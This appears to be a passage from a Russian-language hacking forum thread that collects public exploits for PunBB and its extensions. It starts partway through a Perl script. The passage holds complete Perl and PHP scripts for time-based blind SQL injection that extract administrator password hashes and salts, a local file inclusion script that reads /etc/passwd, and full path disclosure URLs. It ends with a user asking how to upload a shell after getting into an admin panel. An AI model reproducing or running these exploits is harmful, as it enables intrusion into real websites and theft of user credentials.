$Host, $DefaultTime, $J, $Hash, $Time, $I); last; } } if($I == 1 && length $Hash < 1 && !$Hash){ print " * Exploit Failed *\n"; print " ------------------------------------------------------ \n"; exit; } if($I == 40){ print " * Exploit Successed *\n"; print " ------------------------------------------------------\n "; system("pause"); } } sub usage{ system("cls"); { print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [username] [password] [id] *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------ \n"; }; exit; } sub request{ $Referrer = $_[0]; $Method->content_type('application/x-www-form-urlencoded'); $Method->content($Referrer); $Start = Time::HiRes::time(); $Response = $HTTP->request($Method); $Response->is_success() or die "$Host : ", $Response->message,"\n"; $End = Time::HiRes::time(); $Time = $End - $Start; return $Time; } sub refresh{ system("cls"); { print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [username] [password] [id] *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------ \n"; }; print $_[0] ."\n"; print " * Victime Site: " . $_[1] . "\n"; print " * Default Time: " . $_[2] . " seconds\n"; print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n"; print " * BruteForcing N Char Hash: " . $_[6] . "\n"; print " * SQL Time: " . $_[5] . " seconds\n"; print " * Hash: " . $_[4] . "\n"; } #WaRWolFz Crew # milw0rm.com [2009-07-28]
PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit Code: #!/usr/bin/perl #[0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit #Coded By Dante90, WaRWolFz Crew #Bug Discovered By: Dante90, WaRWolFz Crew #register_globals = On #magic_quotes_gpc = On use LWP::UserAgent; use HTTP::Cookies; use strict; my $EtcPasswd; my $TransversalDirectory = "./../../../../"; #Transversal Directory my $LFI = "etc/passwd"; #File Inject my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link my $Referrer = "http://www.warwolfz.com/"; my $Cookies = new HTTP::Cookies; my $UserAgent = new LWP::UserAgent( agent => 'Mozilla/5.0', max_redirect => 0, cookie_jar => $Cookies, ) or die $!; sub Local_File_Inclusion{ my ($Directory,$Command) = @_; return "./include/reputation/rep_profile.php?pun_user[language]=${Directory}${Command}%00"; } my $Get = $UserAgent->get($HostName.Local_File_Inclusion($TransversalDirectory,$LFI)); if ($Get->content =~ /No such file or directory in/i){ refresh($HostName, "Exploit Filed"); print " * Error extracting sensible data.\n"; print " * Exploit Failed *\n"; print " ------------------------------------------------------ \n\n"; }else{ $EtcPasswd = $Get->content; open ( FILE , ">WaRWolFz.html" ) or die $!; print FILE $EtcPasswd; close ( FILE ); refresh($HostName, "File Saved"); print " * Exploit Successed *\n"; print " ------------------------------------------------------\n\n"; system("pause"); } sub usage{ system("cls"); { print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------ \n"; }; exit; } sub refresh{ system("cls"); { print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------ \n"; }; print " * Victime Site: " . $_[0] . "\n"; print " * Etc/Passwd: " . $_[1] . "\n"; } #WaRWolFz # milw0rm.com [2009-07-30]
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit Code: f (isset($_GET['secure_str'])) { if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match)) { ... 'WHERE' => 'a.id = '.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum = 1) Злоупотребление preg_match Code: #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by PunBB" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host: target server (ip/hostname) path: path to punbb Example: php '.$argv[0].' localhost /punbb/ +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $pre = 'pun_'; $benchmark = 200000000; $timeout = 10; echo "Plz Waiting...\nPassword:\n"; /** * get pass */ $j = 1; $pass = ''; $hash[0] = 0; //null $hash = array_merge($hash, range(48, 57)); //numbers $hash = array_merge($hash, range(97, 122)); //az letters while (strlen($pass) < 40) { for ($i = 0; $i <= 255; $i ++) { if (in_array($i, $hash)) { $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23'; send(); usleep(2000000); $starttime = time(); send(); $endtime = time(); $difftime = $endtime - $starttime; if ($difftime > $timeout) { $pass .= chr($i); echo chr($i); break; } } if ($i == 255) exit("\nExploit Failed!\n"); } $j ++; } echo "\nSalt:\n"; /** * get salt */ $j = 1; $salt = ''; $hash[0] = 0; //null $hash = array_merge($hash, range(33, 126)); while (strlen($salt) < 12) { for ($i = 0; $i <= 255; $i ++) { if (in_array($i, $hash)) { $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20salt%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23'; send(); usleep(2000000); $starttime = time(); send(); $endtime = time(); $difftime = $endtime - $starttime; if ($difftime > $timeout) { $salt .= chr($i); echo chr($i); break; } } if ($i == 255) exit("\nExploit Failed!\n"); } $j ++; } exit("\nExpoilt Success!\nPassword Hash:\t$pass\nSalt:\t$salt\n"); function send() { global $host, $path, $cmd; $data = "GET ".$path."misc.php?item=1&secure_str=".$cmd." HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Connection: Close\r\n\r\n"; $fp = fsockopen($host, 80); fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?>
есть блайнд ================================================================= PunBB <= 1.3.4 Pun_PM <= v1.2.6 Blind SQL Injection Vulnerability ================================================================= PHP: #!/usr/bin/perl # [0-Day] PunBB <= 1.3.* Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit # Author/s: Dante90, WaRWolFz Crew # Created: 2009.07.30 after 0 days the bug was discovered. # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shades Master, The:Paradox, V1R5, yeat # Greetings To: _ nEmO _, XaDoS, Necrofiend, Lutor, vagabondo, hacku, yawn, The_Exploited, Shotokan-The Hacker, _mRkZ_, # Chuzz, init, plucky, SaRtE, Lupo # Thanks For Testing: BlAcK HaT, l3d # Web Site: www.warwolfz.org # My Wagend (Dante90): dante90wwz.altervista.org # Unit-X Project: www.unitx.net # ---- # Why I've decided to publish this? # Because in "Package: Pun_PM <= v1.2.9" the bug was fixed. # ---- # DETAILS # ./PunBB v1.3.*/extensions/pun_pm/functions.php # LINES: 504 -> 526 # function pun_pm_edit_message() # { # global $forum_db, $forum_user, $lang_pun_pm; # # $errors = array(); # # // Verify input data # $query = array( # 'SELECT' => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body', # 'FROM' => 'pun_pm_messages m', # 'JOINS' => array( # array( # 'LEFT JOIN' => 'users AS u', # 'ON' => '(u.id = m.receiver_id)' # ), # ), # 'WHERE' => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0' # ); # # ($hook = get_hook('pun_pm_fn_edit_message_pre_validate_query')) ? eval($hook) : null; # # $result = $forum_db->query_build($query) or error(__FILE__, __LINE__); # ---- # GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1' # Error - PunBB # An error was encountered # The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php # Database reported: Errore di sintassi nella query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Errno: 1064). use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common; use Time::HiRes; use IO::Socket; my ($UserName,$PassWord,$ID) = @ARGV; if (@ARGV < 3) { &usage(); exit(); } my $Message = ""; my $Hash = ""; my ($Time,$Time_Start,$Time_End,$Response); my ($Start,$End); my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link my $Method = HTTP::Request->new(GET => $Host); my $Cookies = new HTTP::Cookies; my $HTTP = new LWP::UserAgent( agent => 'Mozilla/5.0', max_redirect => 0, cookie_jar => $Cookies, ) or die $!; my $Referrer = "http://www.warwolfz.org/"; my $DefaultTime = request($Referrer); sub request { $Referrer = $_[0]; $Method->referrer($Referrer); $Start = Time::HiRes::time(); $Response = $HTTP->request($Method); $Response->is_success() or die "$Host : ", $Response->message,"\n"; $End = Time::HiRes::time(); $Time = $End - $Start; return $Time; } sub Blind_SQL_Jnjection { my ($dec,$hex) = @_; return "./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--"; } sub Clear() { my $launch = $^O eq 'MSWin32' ? 'cls' : 'clear'; return system($launch); } sub Login() { if ($ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) { $Cookies->proxy(['http', 'ftp'], 'http://'.$ARGV[4]) or die $!; } my $Get = $HTTP->get($Host.'login.php'); my $csrf_token = ""; if ($Get->content =~ /type="hidden" name="csrf_token" value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input $csrf_token = $1; } my $Login = $HTTP->post($Host.'login.php', [ form_sent => '1', redirect_url => $Host.'login.php', csrf_token => $csrf_token, req_username => $UserName, req_password => $PassWord, save_pass => '1', login => 'Login', ]) || die $!; if ($Login->content =~ /Verrai trasferito automaticamente ad una nuova pagina in 1 secondo/i) { #English Language: You should automatically be forwarded to a new page in 1 second. return 1; } else { return 0; } } sub usage { Clear(); { print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [username] [password] [id] *\n"; print " * [proxy] is optional (ex: 151.57.4.97:8080) *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------ \n"; }; exit; } sub refresh { Clear(); { print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [username] [password] [id] *\n"; print " * [proxy] is optional (ex: 151.57.4.97:8080) *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------ \n"; }; print $_[0] ."\n"; print " * Victime Site: " . $_[1] . "\n"; print " * Default Time: " . $_[2] . " seconds\n"; print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n"; print " * BruteForcing N Char Hash: " . $_[6] . "\n"; print " * SQL Time: " . $_[5] . " seconds\n"; print " * Hash: " . $_[4] . "\n"; } sub Main(){ if (Login() == 1) { $Message = " * Logged in as: ".$UserName; } elsif (Login() == 0) { $Message = " * Login Failed."; refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1"); print " * Exploit Failed *\n"; print " ------------------------------------------------------ \n"; exit; } for (my $I=1; $I<=40; $I++) { #N Hash characters for (my $J=0; $J<=15; $J++) { #0 -> F $Time_Start = time(); my $Get1 = $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J])); $Time_End = time(); $Time = request($Referrer); refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I); if ($Time_End - $Time_Start > 6) { $Time = request($Referrer); refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I); if ($Time_End - $Time_Start > 6) { syswrite(STDOUT,chr($chars[$J])); $Hash .= chr($chars[$J]); $Time = request($Referrer); refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I); last; } } } if ($I == 1 && length $Hash < 1 && !$Hash) { print " * Exploit Failed *\n"; print " ------------------------------------------------------ \n"; exit; } if ($I == 40) { print " * Exploit Successfully Executed *\n"; print " ------------------------------------------------------\n "; system("pause"); } } } Main(); #WaRWolFz Crew # Inj3ct0r.com [2010-07-27] =========================================================== PunBB Automatic Image Upload 1.0 Shell Upload Vulnerability ===========================================================
Code: [COLOR=DarkGreen]# Exploit Title: Punbb 1.3.4 Full Path Disclosure # Date: 07/11/2010 # Author: SYSTEM_OVERIDE, OverSecurityCrew # Software Link: http://punbb.informer.com/ # Vulnerability Type: Full Path Disclosure # Version: 1.3.4[/COLOR] Злоумышленник может узнать ROOTPATH. Уязвимые файлы: Code: [COLOR=DarkGreen]/search.php /userlist.php moderate.php[/COLOR] Example: Code: http://www.site.com/[path]/search.php?action=search&keywords[]=&author[]=&search_in=all&sort_by=0&SORT_DAshow_as=DESC&topics=&search=Submit+search http://www.site.com/[path]/userlist.php?username[]=&show_group=-1&sort_by=username&sort_dir=ASC&search=Avvia+ricerca http://www.site.com/[path]/moderate.php?get_host[]=
Войдете в админку - там четко написано какая версия. Я вот вошел, не пойму чё дальше делать, как шел залить.
